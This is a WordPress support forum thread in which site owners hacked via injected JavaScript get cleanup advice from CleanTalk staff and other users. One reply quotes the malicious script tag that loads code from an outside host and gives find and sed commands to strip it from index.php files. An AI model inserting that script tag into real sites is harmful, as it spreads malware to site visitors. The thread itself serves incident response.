hacked

Hello @fritzke

Did you start a scan using the CleanTalk Security plugin?

What the result you’ve got?

Hi,

That’s not possible because I can’t get into my admin or site.

Hacked ? … so what can I do please ?

It seems yes. Please, contact your hosting provider to restore the site from a good-functional backup copy.

When it will be done, scan the site using the CleanTalk Security plugin and give us feedback with founded results.

Best regards,

ok … I’am busy to restore a backup … thanks … I’ll let you know

Can “WPBakery Page Builder” be the culprit ?

Problems, slow and finaly nothing anymore, started when working with built-in content elements “hover box”.

Thank you all for your feedback.
We recommend do the next steps

1)Сontact your hosting provider to restore the site from a good-functional backup copy.

2)Install the Security for WordPress plugin. https://downloads.www.ads-software.com/plugin/security-malware-firewall.2.46.2.zip

3)Scan the site using the CleanTalk Security plugin and give us feedback with founded results https://cleantalk.org/help/security-malware-scanner

4)Send us scanner results using this guide https://cleantalk.org/help/files-analysis

Best wishes

Hi,

I send 7 “critical” files. But I think those are positive false.

Hello.

My website have been attack this night too.

All your index.php files have been infected by an injection of a javascript call ‘<script type=’text/javascript’ src=’https://ws.stivenfernando.com/stm?v=2.2.0′></script>&#8217;

1 – You have to remove this line in each index file by using find & sed

find . -name “index.php” -exec sed -i “s#<script type=’text/javascript’ src=’https://ws.stivenfernando.com/stm?v=2.2.0′></script>##g&#8221; {} +

2 – Remove extra index files created by the sript

find . -name “._index.php” -print -delete

3 – The script have change the siteurl in the database you have to fix it

in the table wp_options where option_name is siteurl replace the option_value by the correct url

Glad to help

@fritzke We’ve checked these files. Yes, they are safe.
@nikko75 Thank you for help! This must be a solution.
Best regards,

SOLVED (For my case at least)

If you look at the code that @jommartinez posted – I’m sure that is what affected the site of mine. The only file that is modified is the header.php in the theme. This is reflected in his posted code.

Some of you on this thread may have had a slightly modified version of this or have suffered multiple hacks so this fix may not resolve the issue for everyone here.

For my specific case I did the following;

– Removed the line from the header.php file in your theme – If you can remove the (line in where it is calling the javascript. it may be called in an abstract way like it was on my site using the “cryptico.js” js to encrypt the exploit call making it harder to notice.)

– Once this has been done you will need to roll back your database.

– I would strongly recommend any of you using a PHP version lower than 7.2 to upgrade.

I would be keen to hear if this helped anyone else.

• This reply was modified 4 years, 10 months ago by spaceapemedia.
• This reply was modified 4 years, 10 months ago by spaceapemedia.

Helllo @donnjke @spaceapemedia @tomtschi @maltris @nathalierobayo

Please, someone send the “header.php”, templates and JS files. We a making a cure right now. It will be ready in 10 minutes, but we need the data.

Send the files to [email protected].

Note: Malware code has been removed by the moderators. Please do not post malware here.

Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

If you need support and you are not the person who originally raised this support topic then per the forum guidelines please start your own topic.

https://www.ads-software.com/support/forum-user-guide/faq/#i-have-the-same-problem-can-i-just-reply-to-someone-elses-post-with-me-too

You can do so here.

https://www.ads-software.com/support/plugin/security-malware-firewall/#new-post

I am closing this topic and archiving all of the pile on replies. I’ve left a couple that were helpful. Do not take over someone else’s topic that way again. That’s not how these forums work and please create you own topic instead.

Per @shagimuratov

Hello everyone.

The cure is here. I mean this topic https://www.ads-software.com/support/topic/hacked-138/

Install the latest plugin from here: https://github.com/CleanTalk/security-malware-firewall/releases/download/dev-version/security-malware-firewall.zip.

Switch setting “Cure malware” and “Signature analysis”, save settings and run the scan.

It will cure JS script attachments in PHP files and malicious PHP code.

If your database malformed and experiencing difficulties with restoring it. Put this file (https://www.dropbox.com/s/xr421acpxbqp72j/fix.php?dl=0) in the root directory and proceed to YOUR_WEBSITE.URL/fix.php, do not forget to delete it!

Let us know if you have questions.

If you do have questions, please post your own support topic.